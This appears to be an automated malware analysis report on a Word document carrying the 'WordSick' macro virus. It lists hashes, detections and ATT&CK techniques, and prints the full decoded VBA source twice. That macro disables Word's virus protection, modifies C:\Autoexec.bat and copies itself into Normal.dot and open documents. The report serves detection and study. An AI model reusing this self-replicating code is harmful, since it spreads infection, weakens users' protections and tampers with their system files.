Office (OLE) malware analysis — malicious · bcda25f5d0e2d7af

MALICIOUS

Office (OLE)

27.5 KB Created: 2000-05-17 22:41:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 4841905eccae2bc98ff0e15fe638af97 SHA-1: d982319465292491ee3cf9dcb0b268685f8f490c SHA-256: bcda25f5d0e2d7afc8a4b9203a2c1927abeb3df37553c8a02813be0f3c3623ad

140 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro with an AutoClose subroutine, which is a common technique for executing malicious code when a document is closed. The script attempts to append 'ECHO Help Me Im Sick' to C:\Autoexec.bat, potentially modifying system startup behavior. It also attempts to infect the Normal.dot template and the active document with its macro, and exports itself to 'c:\WordSick.drv'.

Heuristics 4

ClamAV: Doc.Trojan.Fool-11 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Fool-11
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Auto_Close macro high OLE_VBA_AUTOCLOSE

Auto_Close macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1542 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1542 bytes
SHA-256: `b1668b9a45d380d008c75d49d760fb2e10c6b43661ed4b6a70c1d1a11df43d26`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "WordSick" Sub AutoClose() 'WordSick Virus v1.00 'The WaLRuS 05/00 On Error Resume Next Options.ConfirmConversions = False Options.VirusProtection = False Options.SaveNormalPrompt = False ActiveDocument.ReadOnlyRecommended = False SetAttr "C:\Autoexec.bat", 0 Open "C:\Autoexec.bat" For Append As #1 Print #1, "ECHO Help Me Im Sick " Close #1 Finish: If (Second(Now()) > 50) Then Call HelpCall Set Norm = NormalTemplate.VBProject.VBComponents Set Doc = ActiveDocument.VBProject.VBComponents If Norm.Item("WordSick").Name <> "WordSick" Then Doc("WordSick").Export "c:\WordSick.drv" Set infect = NormalTemplate.VBProject ElseIf Doc.Item("WordSick").Name <> "WordSick" Then Norm("WordSick").Export "c:\WordSick.drv" Set infect = ActiveDocument.VBProject End If infect.VBComponents.Import ("c:\WordSick.drv") ActiveDocument.Save End Sub Sub HelpCall() On Error Resume Next MsgBox "Please Help Me Im Sick", vbInformation Assistant.Visible = True With Assistant.NewBalloon .Icon = msoIconAlert .Text = "Please Help Me Im Sick" .Heading = "HELP" .Show End With End Sub

SHA-256: b1668b9a45d380d008c75d49d760fb2e10c6b43661ed4b6a70c1d1a11df43d26

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "WordSick"

Sub AutoClose()
    'WordSick Virus v1.00
    'The WaLRuS 05/00
    On Error Resume Next
    Options.ConfirmConversions = False
    Options.VirusProtection = False
    Options.SaveNormalPrompt = False
    ActiveDocument.ReadOnlyRecommended = False
    SetAttr "C:\Autoexec.bat", 0
    Open "C:\Autoexec.bat" For Append As #1
    Print #1, "ECHO                    Help Me Im Sick     "
    Close #1
Finish:
If (Second(Now()) > 50) Then Call HelpCall
    Set Norm = NormalTemplate.VBProject.VBComponents
    Set Doc = ActiveDocument.VBProject.VBComponents
If Norm.Item("WordSick").Name <> "WordSick" Then
    Doc("WordSick").Export "c:\WordSick.drv"
    Set infect = NormalTemplate.VBProject
ElseIf Doc.Item("WordSick").Name <> "WordSick" Then
    Norm("WordSick").Export "c:\WordSick.drv"
    Set infect = ActiveDocument.VBProject
End If
infect.VBComponents.Import ("c:\WordSick.drv")
ActiveDocument.Save
End Sub

Sub HelpCall()
    On Error Resume Next
    MsgBox "Please Help Me Im Sick", vbInformation
    Assistant.Visible = True
    With Assistant.NewBalloon
    .Icon = msoIconAlert
    .Text = "Please Help Me Im Sick"
    .Heading = "HELP"
    .Show
    End With
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.